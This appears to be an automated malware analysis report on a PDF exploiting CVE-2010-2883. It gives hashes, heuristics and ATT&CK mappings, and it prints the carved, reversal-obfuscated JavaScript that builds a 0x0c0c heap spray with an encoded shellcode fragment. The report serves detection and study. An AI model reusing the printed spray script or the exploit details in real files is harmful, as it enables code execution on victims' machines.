Malicious PDF — malware analysis report

Static analysis result for SHA-256 6c9b75913c5922e5…

MALICIOUS

PDF

67.7 KB First seen: 2013-02-22
MD5: 9f3cc2ab91e25f7bd7ecec37d9ca8d1c SHA-1: 74c8c7decb3cec452a19bd75150767cd9e5c271e SHA-256: 6c9b75913c5922e5e2bec1e09e1d4272266ddd9925d99f52a308513b96c528b5
128 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The critical heuristic firing for CVE-2010-2883 indicates a vulnerability exploitation, which is likely leveraged by the JavaScript to achieve code execution. The embedded URL, while not directly used in the obfuscated script, suggests a potential C2 communication channel.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 5

  • CVE-2010-2883 Adobe CoolType SING uniqueName stack overflow critical CVE exact CVE_2010_2883
    An embedded font carries an sfnt SING (Smart INdependent Glyphlets) table whose uniqueName field is overflowed -- the structural shape of the CVE-2010-2883 Adobe CoolType stack buffer overflow. A legitimate glyphlet SING table is a few dozen bytes with a short, printable, NUL-terminated uniqueName; the exploit oversizes the table and fills uniqueName with an icucnv36.dll ROP chain and/or 0x0c0c0c0c heap-spray landing value.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x10A83 758 bytes
SHA-256: 4a970dddcd9cbc2e473e112008ca94ca12590df8644a7442818d0be7d9acdde9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."3e14u%b182u%a9fcu%" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off0000035e.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x35E 67284 bytes
SHA-256: 35b6962eeb9aa4a8acb1109b74102eb9d08ab437da4460a890e43cabdc8c59d3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.